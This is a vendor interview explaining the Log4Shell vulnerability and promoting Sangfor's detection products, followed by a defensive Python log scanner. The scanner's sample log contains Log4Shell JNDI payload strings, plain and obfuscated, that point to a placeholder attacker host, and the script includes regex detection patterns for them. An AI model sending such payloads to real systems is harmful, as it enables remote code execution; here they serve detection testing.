There has been a lot of noise on Apache Log4j2 (Log4Shell) Remote Code Execution Vulnerability (CVE-2021-44228). Watch this short video on all you need to know about this vulnerability, if you are affected by it and how to mitigate it. Learn also more about the emergency response guidelines by Jason Yuan, VP – Product & Marketing, Sangfor Technologies.
Most of the documents and material available online on this vulnerability are very technical and difficult to understand, so we invited a subject matter expert to explain it in simpler, easier-to-understand language.
Interview with Jason Yuan, VP – Product & Marketing, Sangfor Technologies
So, what’s the big deal about this Log4j2 (Log4Shell) Vulnerability?
- This is the biggest security event of the decade.
- Some say it’s the biggest security vulnerability since the Internet was invented. It impacts both businesses and consumers.
- In the United States, the director of the Cybersecurity and Infrastructure Security Agency (CISA), Jen Easterly, termed the exploit "critical" and advised vendors to prioritize software updates.
- The German Federal Office for Information Security (BSI) designated the exploit as being at its highest threat level, calling it an "extremely critical threat situation" (translated).
Who might have these Apache Log4j2 (Log4Shell) CVE-2021-44228 Vulnerabilities?
- First of all, a bit technical background: Log4j2 is used by a very large percentage of the Java programs developed in the last decade for both server and client applications. Java is also one of the top programming languages used by businesses.
- Second: to answer your question, this impacts software used by enterprises and governments globally. Essentially, all industries. All geographies. Sangfor’s global threat intelligence has the capability to scan the internet to identify weak systems. Last week, shortly after we learned about this vulnerability, we identified 3000 infected servers within 1 hour. Many more in the next few days. Interestingly enough, education tops the list. My guess is that they don’t have enough IT budget to buy software; nor do they have enough security budget to secure it. However, pretty much all industries suffer.
- Third: much consumer software is impacted. Here is what’s been detected in the past few days: Bluetooth headphones. If you play games, Minecraft allows other game users to turn your machine into a crypto miner. On the internet, someone managed to demonstrate this vulnerability on iCloud. Such weaknesses have been found on the most popular e-commerce websites. On an even more dangerous side: a successful POC has been performed on a top-branded automotive entertainment system.
What’s the potential impact of Log4j2 (Log4Shell) CVE-2021-44228 Vulnerability?
- This is a zero-day arbitrary code execution. It’s characterized as the “single biggest, most critical vulnerability of the last decade”.
- This allows remote code execution without credentials. Meaning, someone can take over your system, which means they can run any code and access all data on the affected machine. It also allows them to delete or encrypt files and hold them for ransom.
- However, it’s not a very difficult attack. And it does not require sophisticated software programming experience.
- All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.
How about customers with their own software?
- Any customers with some open-source software might be subject to such attacks as well.
- The Apache Software Foundation assigned the maximum CVSS severity rating of 10 to Log4Shell, as millions of servers could potentially be vulnerable to the exploit.
- The security of the supply chain is demonstrated to be very important.
What’s going on in the past few days on CVE-2021-44228 Vulnerability?
- Security responders within software companies are scrambling to patch the bug, which can be easily exploited to take control of vulnerable systems remotely.
- At the same time, hackers are actively scanning the internet for affected systems. Some have already developed tools that automatically attempt to exploit the bug, as well as worms that can spread independently from one vulnerable system to another under the right conditions.
- We forecast that many new ransomware campaigns will leverage this vulnerability in the coming weeks.
What do you suggest our customers do next?
- Self-assess your own exposure ASAP. Some can be done in hours, others may take weeks. You will need to check with your software and hardware providers.
- In case you need a quicker assessment, I would like to suggest that you work with vendors like ourselves to help you with an automated assessment. Here are some examples:
- From your network traffic, our Network Traffic Analysis can detect any software within your network that uses the vulnerable Log4j2 versions.
- From the server point of view, we have software tools to help you get a list of assets that contains all the software used, and can further identify the vulnerable systems.
Once I have uncovered my vulnerabilities of Log4j2 (Log4Shell) CVE-2021-44228, what should I do next?
- Patch if you can.
- However, much software cannot be patched, as it might be running on legacy software, like older versions of Java.
- Change configuration. There are three alternatives. We can provide the details.
- Virtual patch by FW or IPS if needed. Contact us for details.
- Deploy an NDR like ours to help you improve asset discovery, detection and response.
How would any customer know if they are compromised?
- Log review
- Most traditional tools, such as FW and AV, are used for prevention. What you need to improve is a much stronger detection and response capability.
- Use tools such as our NDR to improve your Detection capabilities.
- Should you uncover any security incidents, you can contact us for help from our incident response team.
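As an added example for the log review step (not Sangfor's tooling and not code from the interview), here is a small Python scanner for the trace the interview describes: the malicious lookup string that gets logged by Log4j 2. It also collapses the nested-lookup obfuscations defenders commonly see before matching. The sample log lines are constructed, and attacker.example is a placeholder host, not a real indicator.

```python
"""Log-review helper for Log4Shell traces (added example, not Sangfor's code).
Log4j 2.x expands ${...} lookups in logged messages, so a logged "${jndi:" is
the trace to hunt for. Attackers hide it behind nested lookups such as
${lower:j} or ${::-j}, so those are collapsed before matching."""
import re

# ${lower:X} -> x and ${upper:X} -> X (real Log4j case lookups).
_CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}")
# ${name:-X} -> X, Log4j default-value syntax; we assume the lookup before
# ":-" is undefined, which is the conservative choice for detection.
_DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _case(m):
    return m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper()


def normalize(text, max_rounds=20):
    """Resolve nested obfuscation lookups from the inside out until stable."""
    for _ in range(max_rounds):
        new = _DEFAULT_RE.sub(lambda m: m.group(1), _CASE_RE.sub(_case, text))
        if new == text:
            break
        text = new
    return text


def find_jndi(line):
    """Return the de-obfuscated line if it carries a JNDI lookup, else None."""
    normalized = normalize(line)
    return normalized if _JNDI_RE.search(normalized) else None


def scan(lines):
    """Return (1-based line number, de-obfuscated line) for every hit."""
    results = ((n, find_jndi(line)) for n, line in enumerate(lines, start=1))
    return [(n, hit) for n, hit in results if hit is not None]


# Constructed sample access log; the User-Agent is the last quoted field and
# attacker.example is a placeholder host, not a real indicator.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/a}"',
    'INFO 2021-12-10 12:00:05 tenant=${env:TENANT:-default} login ok',
]
```

Running scan(SAMPLE_LOG) reports lines 2, 3 and 4 with the same de-obfuscated lookup, while the benign default-value lookup on line 5 is not flagged.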